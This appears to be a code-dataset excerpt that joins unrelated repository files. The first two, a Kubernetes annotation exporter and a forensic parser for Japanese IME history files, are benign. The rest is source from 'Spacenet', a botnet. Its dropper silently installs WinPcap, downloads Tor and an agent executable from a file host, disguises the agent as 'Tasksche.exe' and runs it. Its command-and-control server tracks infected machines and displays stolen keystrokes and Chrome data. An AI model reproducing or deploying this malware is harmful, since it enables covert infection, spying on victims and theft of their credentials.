description="""Exporter to export Kubernetes resource annotations
as Prometheus metrics"""
)
parser.add_argument(
"--version",
action="version",
version="k8s-annotations-exporter {ver}".format(ver=__version__),
)
parser.add_argument(
"--kube-config-file",
help="""Kube config file location. If no argument provided,
the config will be loaded from default location.""",
)
parser.add_argument(
"--in-cluster",
help="Set this flag when running within the cluster, to use a serviceaccount",
action="store_const",
const=True,
default=False,
)
parser.add_argument(
"--metrics-refresh-interval",
help="Metric data refresh interval in seconds",
type=int,
default=60,
)
parser.add_argument(
"--http-server-port",
help="Port number to start the metrics HTTP server. Default: 8000",
type=int,
default=8000,
)
parser.add_argument(
"--resource-api-version",
help="Kubernetes resource API version. Default: v1",
type=str,
default="v1",
)
parser.add_argument(
"--resource-kind",
help="Kubernetes resource kind. Default: Namespace",
type=str,
default="Namespace",
)
parser.add_argument(
"-v",
"--verbose",
dest="loglevel",
help="set loglevel to INFO",
action="store_const",
const=logging.INFO,
)
parser.add_argument(
"-vv",
"--very-verbose",
dest="loglevel",
help="set loglevel to DEBUG",
action="store_const",
const=logging.DEBUG,
)
return parser.parse_args(args)
def setup_logging(loglevel):
"""Setup basic logging
Args:
loglevel (int): minimum loglevel for emitting messages
"""
logformat = "[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
logging.basicConfig(
level=loglevel, stream=sys.stdout, format=logformat, datefmt="%Y-%m-%d %H:%M:%S"
)
def main(args):
"""Wrapper allowing :func:`fib` to be called with string arguments in a CLI fashion
Instead of returning the value from :func:`fib`, it prints the result to the
``stdout`` in a nicely formatted message.
Args:
args (List[str]): command line parameters as list of strings
(for example ``["--verbose", "42"]``).
"""
args = parse_args(args)
setup_logging(args.loglevel)
if args.in_cluster:
# if in-cluster mode is set in args, try using the incluster serviceaccount
k8s_config = config.load_incluster_config()
else:
k8s_config = config.load_kube_config(config_file=args.kube_config_file)
search_params = {
"api_version": args.resource_api_version,
"kind": args.resource_kind,
}
_logger.info("Kubernetes resource search parameters: {0}".format(search_params))
metric_collector = CustomCollector(
InfoMetricFamily(
"k8s_resource_annotations", "Annotations set in a k8s resource"
)
)
start_http_server(args.http_server_port)
_logger.info("HTTP server started at port: {0}".format(args.http_server_port))
REGISTRY.register(metric_collector)
_logger.info(
"Metrics will be refreshed every {0} seconds".format(
args.metrics_refresh_interval
)
)
while True:
update_metric(metric_collector, fetch_metric_data(k8s_config, search_params))
_logger.debug("Metrics page updated.")
time.sleep(args.metrics_refresh_interval)
def run():
"""Calls :func:`main` passing the CLI arguments extracted from :obj:`sys.argv`
This function can be used as entry point to create console scripts with setuptools.
"""
main(sys.argv[1:])
if __name__ == "__main__":
# ^ This is a guard statement that will prevent the following code from
# being executed in the case someone imports this file instead of
# executing it as a script.
# https://docs.python.org/3/library/__main__.html
# After installing your project with pip, users can also run your Python
# modules as scripts via the ``-m`` flag, as defined in PEP 338::
#
# python -m k8s_annotations_exporter.export -v
#
run()
``` |
{
"source": "4n6ist/JpnIHDS",
"score": 3
} |
#### File: 4n6ist/JpnIHDS/JpnIHDS_parser.py
```python
import os
import sys
import argparse
import csv
from datetime import datetime, timedelta, timezone
from ctypes import *
class FHeader(LittleEndianStructure):
_pack_ = 1
_fields_ = (
('modified_time', c_uint64),
('file_size', c_uint32),
('unknown1', c_uint32), # 1 or 2
('history_num', c_uint32),
('header_size', c_uint32),
('learn_num', c_uint32),
('history_size', c_uint32)
)
class RHeader(LittleEndianStructure):
_pack_ = 1
_fields_ = (
('conv_time', c_uint64),
('record_size', c_uint16),
('header_size', c_uint16),
('unknown2', c_byte), # always 1
('conv_num', c_byte),
('unknown3', c_uint16) # history == 0, learn > 0
)
class RBody(LittleEndianStructure):
_pack_ = 1
_fields_ = (
('body_size', c_uint16),
('input_length', c_ubyte),
('conv_length', c_ubyte),
('unknown4', c_uint32)
)
def print_fhdr_info(fhdr):
timestamp_us = fhdr.modified_time/10.
print("--File Header Information--")
print("Timestamp(UTC): ", datetime(1601,1,1) + timedelta(microseconds=timestamp_us))
print("FileSize: ", fhdr.file_size)
print("Unknown1: ", fhdr.unknown1)
print("HistoryRecords: ", fhdr.record_num)
print("HeaderSize: ", fhdr.header_size)
print("LearnRecords: ", fhdr.learn_num)
print("HistorySize: ", fhdr.history_size)
print()
def print_rhdr_info(rhdr):
print("--Record Header Information--")
print("RecordSize: ", rhdr.record_size)
print("HeaderSize: ", rhdr.header_size)
print("Unknown2: ", rhdr.unknown2)
print("ConvNum: ", rhdr.conv_num)
print("Unknown3: ", rhdr.unknown3)
print()
def print_rbody_info(rbody):
print("--Record Body Information--")
print("BodySize: ", rbody.body_size)
print("InputLength: ", rbody.input_length)
print("ConvLength: ", rbody.conv_length)
print("Unknown4: ", rbody.unknown4)
print()
def parse_record_body(input_file, rbody, inputlist, convlist, mergelist, unknown4list):
unknown4list.append(str(rbody.unknown4))
input_chars = input_file.read(rbody.input_length*2).decode('UTF-16LE')
inputlist.append(input_chars)
if rbody.conv_length > 0:
conv_chars = input_file.read(rbody.conv_length*2).decode('UTF-16LE')
convlist.append(conv_chars)
mergelist.append(conv_chars)
else:
mergelist.append(input_chars)
def utc_to_jst(timestamp_utc):
# timestamp_jst = timestamp_utc.astimezone(timezone(timedelta(hours=+9)))
timestamp_jst = timestamp_utc + timedelta(hours=+9)
converted_jst = datetime.strftime(timestamp_jst, '%Y-%m-%d %H:%M:%S.%f')
return converted_jst
def parse_jpnihds(input_file, output, debug):
record_field = []
num=0
fhdr = FHeader()
input_file.readinto(fhdr)
if debug:
print_fhdr_info(fhdr)
cur_pos = fhdr.header_size
while input_file.tell() < fhdr.file_size:
input_file.seek(cur_pos)
rhdr = RHeader()
input_file.readinto(rhdr)
timestamp_us = rhdr.conv_time/10.
timestamp_utc = datetime(1601,1,1) + timedelta(microseconds=timestamp_us)
tsstr_utc = datetime.strftime(timestamp_utc, '%Y-%m-%d %H:%M:%S.%f')
tsstr_jst = utc_to_jst(timestamp_utc)
if debug:
print_rhdr_info(rhdr)
inputlist, convlist, mergelist, unknown4list = [],[],[],[]
input_file.seek(cur_pos+rhdr.header_size)
rbody = RBody()
input_file.readinto(rbody)
if debug:
print_rbody_info(rbody)
parse_record_body(input_file, rbody, inputlist, convlist, mergelist, unknown4list)
for i in range(rhdr.conv_num-1):
input_file.readinto(rbody)
if debug:
print_rbody_info(rbody)
parse_record_body(input_file, rbody, inputlist, convlist, mergelist, unknown4list)
input_str=" ".join(inputlist)
conv_str=" ".join(convlist)
merge_str="".join(mergelist)
unknown4_str=" ".join(unknown4list)
record_field.extend([cur_pos, num, tsstr_utc, tsstr_jst, input_str, conv_str, merge_str, rhdr.unknown2, rhdr.unknown3, unknown4_str])
try:
csv.writer(output, delimiter="\t", lineterminator="\n", quoting=csv.QUOTE_ALL).writerow(record_field)
except UnicodeEncodeError as err:
print('UnicodeEncodeError has occurred. To save the result, use -o option instead of redirect.', file=sys.stderr)
sys.exit("Quit.")
record_field = []
num += 1
cur_pos += rhdr.record_size
def main():
parser = argparse.ArgumentParser(description="JpnIHDS.dat parser")
parser.add_argument("input", help="Input File - JpnIHDS.dat")
parser.add_argument("-o", "--output", help="Output File (Default: stdout)")
parser.add_argument("--debug", action="store_true", default=False, help="Debug Mode")
args = parser.parse_args()
if os.path.exists(os.path.abspath(args.input)):
input_file = open(args.input, "rb")
else:
sys.exit("{0} does not exist.".format(args.input))
if args.output:
tsv = open(args.output, "w", encoding='UTF-16')
else:
tsv = sys.stdout
row = ["offset", "no.", "timestamp(utc)", "timestamp(jst)", "input", "converted", "merged", "unknown2", "unknown3", "unknown4"]
csv.writer(tsv, delimiter="\t", lineterminator="\n", quoting=csv.QUOTE_ALL).writerow(row)
parse_jpnihds(input_file, tsv, args.debug)
if __name__ == '__main__':
main()
``` |
{
"source": "4n6strider/Spacenet",
"score": 3
} |
#### File: Agent/Dropper/dropper.py
```python
import os
import sys
import zipfile
import random
import string
import urllib
import psutil
import requests
import shutil
from threading import Thread
from time import sleep
from pathlib import Path
DSTFOLDER = ''
if getattr(sys, 'frozen', False):
EXECUTABLE_PATH = sys.executable
elif __file__:
EXECUTABLE_PATH = __file__
else:
EXECUTABLE_PATH = ''
EXECUTABLE_NAME = os.path.basename(EXECUTABLE_PATH)
def mdown(url,dst):
# M download
r = requests.get(url, verify=False,stream=True)
r.raw.decode_content = True
with open(dst, 'wb') as f:
shutil.copyfileobj(r.raw, f)
def sttor(path_to_execute):
os.system(path_to_execute)
def wintest():
paths = ["C:\\Program Files (x86)\\WinPcap\\rpcapd.exe","C:\\Program Files\\WinPcap\\rpcapd.exe"]
for path in paths:
my_file = Path(path)
if my_file.is_file():
print "[*] Found Occurence of Winpcap"
return True
return False
def stage1():
# Agent Download
global DSTFOLDER
TORRUNNING = False
# Gen Folder Name
fname = 'C:\\Users\\Public\\'
fname += ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(16))
DSTFOLDER = fname
print "[*] Generating folder : " , DSTFOLDER
# Gen File Name
filename = '\\Tasksche.exe'
print "[*] Generating filename : " , filename
# Gen Folder
if not os.path.exists(fname):
print "[*] Creating folder ."
os.makedirs(fname)
#print "[*] Downloading TDMB64.exe ..."
print "[*] Downloading Tor.zip 72 MB ..."
mdown('https://srv-file1.gofile.io/download/jr0NmZ/7db34320a0c414892c0e1fced5b46931/Tor.zip', DSTFOLDER + "\\" + "Tor.zip")
# https://gofile.io/?c=jr0NmZ
print "[+] Downloaded."
print "[*] Creating Extraction dir : " , DSTFOLDER + "\\RT64DMB"
os.makedirs(DSTFOLDER + "\\RT64DMB")
print "[*] Extracting Tor.zip ..."
zip_ref = zipfile.ZipFile(DSTFOLDER + "\\Tor.zip", 'r')
zip_ref.extractall(DSTFOLDER + "\\RT64DMB")
zip_ref.close()
print "[+] Extracted everything"
print "[*] Cleaning up .zip ..."
os.remove(DSTFOLDER + "\\Tor.zip")
print "[*] Downloading winpcap ..."
# Replace URL with Agent URL
mdown('https://github.com/boundary/winpcap-installer/archive/master.zip', DSTFOLDER + "\\" + "winpcap.zip")
print "[+] Downloaded."
print "[*] Creating Extraction dir : " , DSTFOLDER + "\\winpcap"
os.makedirs(DSTFOLDER + "\\winpcap")
print "[*] Extracting winpcap.zip ..."
zip_ref = zipfile.ZipFile(DSTFOLDER + "\\winpcap.zip", 'r')
zip_ref.extractall(DSTFOLDER + "\\winpcap")
zip_ref.close()
print "[+] Extracted everything"
print "[*] Cleaning up .zip ..."
os.remove(DSTFOLDER + "\\winpcap.zip")
print "[*] Renaiming Archive Installer to : Installer.exe ..."
os.rename(DSTFOLDER + "\\winpcap\\winpcap-installer-master\\winpcap-truesight-meter-4.1.3.exe", DSTFOLDER + "\\winpcap\\winpcap-installer-master\\Installer.exe")
print "[*] Starting winpcap installer ..."
os.system(DSTFOLDER + "\\winpcap\winpcap-installer-master\\Installer.exe /S")
print "[*] Checking for Winpcap Installation or Exits ..."
if wintest() == False:
sys.exit(0)
print "[+] Winpcap Installed ."
print "[*] Downloading .exe ..."
# Replace URL with Agent URL
mdown('https://srv-file1.gofile.io/download/9TSelc/7db34320a0c414892c0e1fced5b46931/agentx64.exe', DSTFOLDER + "\\" + filename)
print "[+] Downloaded."
path_to_execute = DSTFOLDER + "\\RT64DMB\\Browser\\TorBrowser\\Tor\\tor.exe --defaults-torrc \\torrc.default"
print "[*] Executing tor.exe command : %s " % path_to_execute
thread = Thread(target = sttor, args = (path_to_execute, ))
thread.start()
while TORRUNNING:
for p in psutil.process_iter():
try:
if p.name() == 'tor.exe':
print "[*] Tor.exe is running..."
TORRUNNING = True
break
except psutil.Error:
print "[*] Tor.exe not found ."
sleep(2000)
print "[*] Executing ... " , DSTFOLDER + "\\" + filename
#Execute File
os.system( DSTFOLDER + "\\" + filename)
stage1()
```
#### File: C&C/modules/makedir.py
```python
import os
# Function to create dir.
def run(dst):
if not os.path.exists(dst):
os.makedirs(dst)
```
#### File: Software/C&C/runner.py
```python
import csv
from BeautifulSoup import BeautifulSoup
def run():
penetration = {}
reader = csv.reader(open('TempDir/tmpLocs.csv'), delimiter=",")
for row in reader:
try:
penetration[row[0].lower()] = float( row[1].strip() )
except:
pass
svg = open('static/images/countries.svg', 'r').read()
soup = BeautifulSoup(svg, selfClosingTags=['defs','sodipodi:namedview','path'])
colors = ["#4f537a", "#495096", "#646ed1", "#000c84", "#0111ad", "#a107c4"]
gs = soup.contents[2].findAll('g',recursive=False)
paths = soup.contents[2].findAll('path',recursive=False)
path_style = "fill-opacity:1;stroke:#ffffff;stroke-width:0.99986994;stroke-miterlimit:3.97446823;stroke-dasharray:none;stroke-opacity:1;fill:"
for p in paths:
if 'land' in p['class']:
try:
rate = penetration[p['id']]
except:
continue
if rate > 100:
color_class = 5
elif rate > 50:
color_class = 4
elif rate > 30:
color_class = 3
elif rate > 10:
color_class = 2
elif rate >= 1:
color_class = 1
else:
color_class = 0
color = colors[color_class]
p['style'] = path_style + color
for g in gs:
try:
rate = penetration[g['id']]
except:
continue
if rate > 100:
color_class = 5
elif rate > 50:
color_class = 4
elif rate > 30:
color_class = 3
elif rate > 10:
color_class = 2
elif rate >= 1:
color_class = 1
else:
color_class = 0
color = colors[color_class]
g['style'] = path_style + color
for t in g.findAll('path',recursive=True):
t['style'] = path_style + color
f = open("static/images/world.svg", "w")
f.write(str(soup).replace('viewbox','viewBox',1))
```
#### File: Software/C&C/server.py
```python
import cherrypy
import sqlite3
import time
import os
import re
import random
import string
import hashlib
import json
import sys
import glob
import chart
import codecs
import HTMLParser
import base64
import argparse
import shutil
import pygame
from itertools import izip
from termcolor import colored, cprint
from urllib2 import urlopen
from contextlib import closing
from threading import Thread
from dateutil.parser import parse
from time import gmtime, strftime
from pathlib import Path
#----------------------------------------------
from modules import makedir
from modules import log
import signal
#----------------------------------------------
# ----- Software vars -----
SYS_VERSION = "0.0.1"
BUFFER_BOT_REMOVED = []
ALL_BOTS = ""
# ------------------------
# ----- Web-Gui vars -----
COOKIE_NAME = "SPACENETSESSID"
SESSION_TIMEOUT = 1000
PRETABLE = '''
<table class="cp_bots">
<tr><th class="cp_bots_th" onclick="sortTable(0)">OS</th><th class="cp_bots_th" onclick="sortTable(1)">Infected N°</th></tr>
'''
OSSUMMARY_LIST = '''
<tr class="cp_bots_tr1">
<th style="text-align:left;font-weight:normal;">{{os}}</th>
<th style="text-align:left">{{occurences}}</th>
</tr>
'''
LOGIN_PASSWORD_FLAG = 0
LAST_CONNECTION_ADMIN = ""
LAST_IP_ADMIN = ""
# ------------------------
#----------------------------------------------
def signal_handler(signal, frame):
SaveLog("Aborted.")
os.system("service tor stop > /dev/null")
os.system("pkill -9 python")
EXECUTEONSTART_FLAG = False
UPDATE_AGENT_FLAG = False
SAVERESULT_FLAG = False
EXECUTEDELAY_FLAG = False
URL_MD = ""
FNAME_MD = ""
DELAY = 0
session_cookie = None
last_session_activity = 0
switch = 0
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
def SaveLog(action):
log.save(str(action))
def file_is_empty(path):
return os.stat(path).st_size==0
def get_cnt(lVals):
global OSSUMMARY_LIST, PRETABLE
output = ''
output1 = ''
output2 = ''
d = dict(zip(lVals, [0] * len(lVals)))
for x in lVals:
d[x] += 1
output1 += OSSUMMARY_LIST.replace("{{os}}",str(x))
output2 += output1.replace("{{occurences}}",str(d[x]))
output = str(PRETABLE) + str(output2) + "</table><br>"
return output
def error_page(status, message, traceback, version):
with open("html/error.html", "r") as f:
SaveLog("SERVER ERROR : %s " %( status, status, message))
html = f.read()
return html % (status, status, message)
def worldgen():
chart.create()
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return None
def html_escape(text):
return "".join(html_escape_table.get(c,c) for c in text)
def validate_botid(candidate):
return re.match('^[a-zA-Z0-9\s\-_]+$', candidate) is not None
def query_DB(sql, params=()):
conn = sqlite3.connect('main.db')
cursor = conn.cursor()
result = []
for row in cursor.execute(sql, params):
result.append(row)
conn.close()
return result
def exec_DB(sql, params=()):
conn = sqlite3.connect('main.db')
cursor = conn.cursor()
cursor.execute(sql, params)
conn.commit()
conn.close()
def get_admin_password():
result = query_DB("SELECT password FROM users WHERE name='admin'")
if result:
return result[0][0]
else:
return None
def set_admin_password(admin_password):
password_hash = hashlib.sha256()
password_hash.update(admin_password)
exec_DB("DELETE FROM users WHERE name='admin'")
exec_DB("INSERT INTO users VALUES (?, ?, ?)", (None, "admin", password_hash.hexdigest()))
def require_admin(func):
def wrapper(*args, **kwargs):
global session_cookie
global last_session_activity
global SESSION_TIMEOUT
if session_cookie and COOKIE_NAME in cherrypy.request.cookie and session_cookie == cherrypy.request.cookie[COOKIE_NAME].value:
if time.time() - last_session_activity > SESSION_TIMEOUT:
raise cherrypy.HTTPRedirect("/timeout")
else:
last_session_activity = time.time()
return func(*args, **kwargs)
else:
raise cherrypy.HTTPRedirect("/login")
return wrapper
class Main(object):
@cherrypy.expose
@require_admin
def index(self):
SaveLog("REQUEST : 300 [ Redirect ] | Redirected to Login.html.")
cherrypy.HTTPRedirect("/cnc")
@cherrypy.expose
def login(self, password=''):
global LOGIN_PASSWORD_FLAG , LAST_CONNECTION_ADMIN , LAST_IP_ADMIN
admin_password = get_admin_password()
if not admin_password:
SaveLog("Admin account not set yet, ready to generate.")
if password:
set_admin_password(password)
with open("html/AdminPasswordSet.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | AdminPasswordSet.html.")
html = f.read()
return html
else:
with open("html/CreatePassword.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | CreatePassword.html.")
html = f.read()
return html
else:
password_hash = hashlib.sha256()
password_hash.update(password)
if password == "":
if LOGIN_PASSWORD_FLAG == 0:
SaveLog("REQUEST : 200 [ Ok ] | New connection on the login.")
LOGIN_PASSWORD_FLAG += 1
else:
pass
else:
if password_hash.hexdigest() == get_admin_password():
global session_cookie
session_cookie = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(64))
cherrypy.response.cookie[COOKIE_NAME] = session_cookie
global last_session_activity
last_session_activity = time.time()
SaveLog("REQUEST : 200 [ Ok ] | Admin logged in with password : %s " % password)
LAST_CONNECTION_ADMIN = str(time.ctime())
LAST_IP_ADMIN = str(cherrypy.request.remote.ip)
raise cherrypy.HTTPRedirect('cnc')
global switch
if switch == 0:
with open("html/Login.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | Login.html.")
html = f.read()
switch += 1
return html
else:
with open("html/LoginEr.html", "r") as f:
if password == "":
SaveLog("REQUEST : 200 [ Ok ] | LoginEr.html.")
else:
SaveLog("REQUEST : 401 [ Unauthorized ] | Login failed with password : %s " % password)
html = f.read()
return html
@cherrypy.expose
def disconnect(self):
SaveLog("Exiting User.")
session_cookie = None
cherrypy.response.cookie[COOKIE_NAME] = ''
cherrypy.response.cookie[COOKIE_NAME]['expires'] = 0
with open("html/Disconnect.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | Disconnect.html.")
html = f.read()
return html
@cherrypy.expose
def timeout(self):
SaveLog("Timeout Session.")
session_cookie = None
cherrypy.response.cookie[COOKIE_NAME] = ''
cherrypy.response.cookie[COOKIE_NAME]['expires'] = 0
with open("html/Timeout.html", "r") as f:
SaveLog("REQUEST : 408 [ Timeout ] | Timeout.html.")
html = f.read()
return html
@cherrypy.expose
@require_admin
def passchange(self, password=''):
SaveLog("REQUEST : 200 [ Ok ] | Admin password updated.")
if password:
set_admin_password(password)
with open("html/AdminPasswordSet.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | AdminPasswordSet.html.")
html = f.read()
return html
else:
SaveLog("REQUEST : 200 [ Ok ] | CreatePassword.html.")
with open("html/CreatePassword.html", "r") as f:
html = f.read()
return html
class CNC(object):
argc_buffer = "null"
@cherrypy.expose
@require_admin
def index(self):
global ALL_BOTS
try:
os.remove("TempDir/tmpLocs.txt")
os.remove("TempDir/tmpLocs.csv")
except:
pass
SaveLog("REQUEST : 200 [ Ok ] | Overview.html")
bot_list = query_DB("SELECT * FROM bots ORDER BY lastonline DESC")
ALL_BOTS = bot_list
output = ""
counter = 0
online = 0
commands = 0
offline = 0
lst_conn = ""
all_cmds = query_DB('SELECT * FROM commands ORDER BY date DESC')
if not all_cmds:
pass
else:
for cmd in all_cmds :
commands += 1
if not bot_list :
loc = "none"
cc = "nn"
chart.run(loc,cc)
lst_conn = "-"
else:
for bot in bot_list:
counter += 1
ip = bot[2]
if counter == 1:
lst_conn = str(time.ctime(bot[1]))
out_file = open("TempDir/BotIps.txt","a")
out_file.write("%s\n" % ip)
out_file.close()
if time.time() - 30 < bot[1]:
online += 1
if '192.168' in ip or '127.0' in ip:
loc = "Italy"
cc = "it"
cc = cc.lower()
chart.run(loc,cc)
else:
#check ip location
url = ('http://freegeoip.net/json/%s' %ip)
try:
with closing(urlopen(url)) as response:
location = json.loads(response.read())
loc = location['country_name']
cc = location['country_code']
cc = cc.lower()
chart.run(loc,cc)
except:
print("Location could not be determined automatically")
thread = Thread(target = worldgen)
thread.start()
thread.join()
with open("html/Overview.html", "r") as f:
html = f.read()
print html
if int(counter) == 0:
offline = 0
else:
offline = int(counter) - int(online)
html = html.replace("{{output}}", str(output))
html = html.replace("{{bots}}", str(counter))
html = html.replace("{{bats}}", str(online))
html = html.replace("{{offs}}", str(offline))
html = html.replace("{{cmds}}", str(commands))
html = html.replace("{{lst}}", str(lst_conn))
with open("TempDir/tmpLocs.txt") as f:
for line in f:
if "none" in line:
pass
else:
country = line.split(":")[0]
country = country.replace(" ","")
botsnumber = line.split(":")[1]
output += '''
<tr>
<th><img src="/static/flags/%s.png" alt="Flag" title="%s" style="all:unset;width:24px;height:24px;vertical-align:middle"></th>
<td>%s</td>
<td>%s</td>
</tr>
''' % (country , country , country, botsnumber)
if output == "":
output = "No bots registered."
html = html.replace("{{output}}", output)
try:
os.remove("TempDir/tmp{{botid}}.txt")
except:
pass
return html
@cherrypy.expose
@require_admin
def account(self):
global LAST_CONNECTION_ADMIN, LAST_IP_ADMIN
with open("html/Account.html", "r") as f:
html = f.read()
html = html.replace("{{time}}", LAST_CONNECTION_ADMIN)
html = html.replace("{{ip}}", LAST_IP_ADMIN)
url = ('http://freegeoip.net/json/%s' % LAST_IP_ADMIN)
if "192.168" in LAST_IP_ADMIN:
html = html.replace("{{geo}}", "Italy")
else:
try:
with closing(urlopen(url)) as response:
location = json.loads(response.read())
loc = location['country_name']
html = html.replace("{{geo}}", loc)
except:
print("Location could not be determined automatically")
return html
@cherrypy.expose
@require_admin
def list(self):
global ALL_BOTS
try:
os.remove("TempDir/tmpLocs.txt")
os.remove("TempDir/tmpLocs.csv")
except:
pass
SaveLog("REQUEST : 200 [ Ok ] | List.html")
bot_list = query_DB("SELECT * FROM bots ORDER BY lastonline DESC")
ALL_BOTS = bot_list
output = ""
counter = 0
online = 0
for bot in bot_list:
counter += 1
ip = bot[2]
out_file = open("TempDir/BotIps.txt","a")
out_file.write("%s\n" % ip)
out_file.close()
if '192.168' in ip or '127.0' in ip:
loc = "Italy"
cc = "it"
cc = cc.lower()
chart.run(loc,cc)
else:
#check ip location
url = ('http://freegeoip.net/json/%s' %ip)
try:
with closing(urlopen(url)) as response:
location = json.loads(response.read())
loc = location['country_name']
cc = location['country_code']
cc = cc.lower()
chart.run(loc,cc)
except:
print("Location could not be determined automatically")
output += '''<tr><td><a href="bot?botid=%s" class="cp_botid">%s</a><a href="info?botid=%s"><img src="/static/images/info.png" alt="Info" title="Info" class="info"></a></td><td>%s</td><td>%s</td><td>%s</td><td><input type="checkbox" id="%s" class="botid" /></td><td VALIGN = Middle Align = Left><img src="/static/flags/%s.png" alt="Flag" title="%s"></td></tr>''' % ( bot[0],bot[0],bot[0], "Online" if time.time() - 30 < bot[1] else time.ctime(bot[1]), bot[2], bot[3],bot[0], loc , loc)
if "Online" in output:
output = output.replace("<td>Online</td>","<td style='color:rgb(66, 134, 244);'>Online</td>")
online += 1
with open("html/List.html", "r") as f:
html = f.read()
html = html.replace("{{bot_table}}", output)
html = html.replace("{{bots}}", str(counter))
try:
os.remove("TempDir/tmp{{botid}}.txt")
except:
pass
return html
@cherrypy.expose
@require_admin
def bot(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Bot.html -> %s " % botid)
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
with open("html/Bot.html", "r") as f:
# Scrive un file.
out_file = open("TempDir/tmp{{botid}}.txt","w")
out_file.write(botid)
out_file.close()
html = f.read()
html = html.replace("{{botid}}", botid)
return html
@cherrypy.expose
@require_admin
def info(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Info.html -> %s " % botid)
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
with open("html/Info.html", "r") as f:
html = f.read()
html = html.replace("{{botid}}", botid)
with open("DumpDir/%s/info.txt"%botid, "r") as e:
buffer = e.read()
buffer = buffer.replace("--", "<tr>")
buffer = buffer.replace("++", "</tr>")
buffer = buffer.replace("::", "<td>")
buffer = buffer.replace(";;", "</td>")
html = html.replace("{{infor}}", buffer)
return html
@cherrypy.expose
@require_admin
def ossummary(self):
SaveLog("REQUEST : 200 [ Ok ] | OsSummary.html")
bot_list = query_DB("SELECT * FROM bots ORDER BY lastonline DESC")
output = ""
buffer_os = ""
counter = 0
osinf = []
for bot in bot_list:
osinf.append(bot[3])
counter+=1
with open("html/OsSummary.html", "r") as f:
html = f.read()
html = html.replace("{{bots}}",str(counter))
if get_cnt(osinf) != "":
html = html.replace("{{ostable}}",str(get_cnt(osinf)))
else :
html = html.replace("{{ostable}}","No Os Infected Yet!")
return html
@cherrypy.expose
@require_admin
def passset(self):
with open("html/AdminPasswordSet1.html", "r") as f:
SaveLog("REQUEST : 200 [ Ok ] | AdminPasswordSet1.html.")
html = f.read()
return html
@cherrypy.expose
@require_admin
def keylogger(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Keylogger.html -> %s " % botid )
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
with open("html/KeyLog.html", "r") as f:
html = f.read()
target0 = "DumpDir/%s/Keystrokes.txt" % botid
my_file = Path(target0)
if my_file.is_file():
with open(target0, "r") as d:
if file_is_empty(target0)== True:
html = html.replace("{{KL}}","No Keystrokes Stored.")
else:
switch = False
for line in d:
CURRENT_WINDOW = ''
TIME_WINDOW = ''
STROKES = ''
tabletorpl = ''
tdpreset = '''<table class="table_info"><tr>
<th>Window Title Name</th>
<td>{{WTN}}</td>
</tr>
<tr>
<th>Time</th>
<td>{{TM}}</td>
</tr><tr>
<th>Keys Pressed</th>
<td>{{STK}}</td>
</tr></table><br><br>{{END}}'''
if line.startswith("["):
CURRENT_WINDOW = line.split("]")[0]
CURRENT_WINDOW = CURRENT_WINDOW.replace("[","")
tabletorpl = tdpreset.replace("{{WTN}}",CURRENT_WINDOW)
TIME_WINDOW = line.split("@", 2)[2]
TIME_WINDOW = TIME_WINDOW.split("|||")[0]
tabletorpl = tabletorpl.replace("{{TM}}",TIME_WINDOW)
STROKES = line.split("|||")[1]
tabletorpl = tabletorpl.replace("{{STK}}",STROKES)
if switch == True:
html = html.replace("{{END}}",tabletorpl)
else:
html = html.replace("{{KL}}",tabletorpl)
switch = True
switch = True
else:
pass
else:
html = html.replace("{{KL}}","No Keystrokes Stored.")
html = html.replace("{{botid}}", botid)
html = html.replace("{{END}}", "")
return html
@cherrypy.expose
@require_admin
def dbpass(self,*argv):
SaveLog("REQUEST : 200 [ Ok ] | Database.html")
with open("html/DbPass.html", "r") as f:
html = f.read()
try:
file = open("TempDir/tmp.txt", "r")
buffer_ = file.read()
if buffer_ == "":
buffer_ = "No matches found for this research."
buffer_ = buffer_.replace("\n","<br>")
buffer_ = buffer_.replace("Website:","<b>Website</b>:")
buffer_ = buffer_.replace("Username:","<b>Username</b>:")
buffer_ = buffer_.replace("Password:","<b>Password</b>:")
buffer_ = buffer_.replace("DumpDir/","")
except :
buffer_ = ""
html = html.replace("{{results}}",buffer_)
try:
os.remove("TempDir/tmp.txt")
except:
pass
return html
@cherrypy.expose
@require_admin
def chrome(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Chrome.html -> %s " % botid)
html = ''
krc = ''
hic = ''
afc = ''
mln = 1000
with open("html/Chrome.html", "r") as f:
html = f.read()
target0 = "DumpDir/%s/KRC.txt" % botid
target1 = "DumpDir/%s/HIC.txt" % botid
target2 = "DumpDir/%s/AFC.txt" % botid
try:
max_counter0 = 0
max_counter1 = 0
max_counter2 = 0
html = html.replace("{{botid}}",botid)
f = codecs.open(target0, encoding='utf-8')
for line in f:
if max_counter0 == mln:
krc += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target0)
break
krc += repr(line)
max_counter0 += 1
krc = krc.replace("'","'")
krc = krc.replace("\\n'","<br>")
krc = krc.replace("u'","")
html = html.replace("{{KRC}}",krc)
h = codecs.open(target1, encoding='utf-8')
for line in h:
if max_counter1 == mln:
hic += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target1)
break
hic += repr(line)
max_counter1 += 1
hic = hic.replace("'","'")
hic = hic.replace("u'","")
hic = hic.replace("\\n'","<br>")
html = html.replace("{{HIC}}",hic)
y = codecs.open(target2, encoding='utf-8')
for line in y:
if max_counter2 == mln:
afc += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target2)
break
afc += repr(line)
max_counter2 += 1
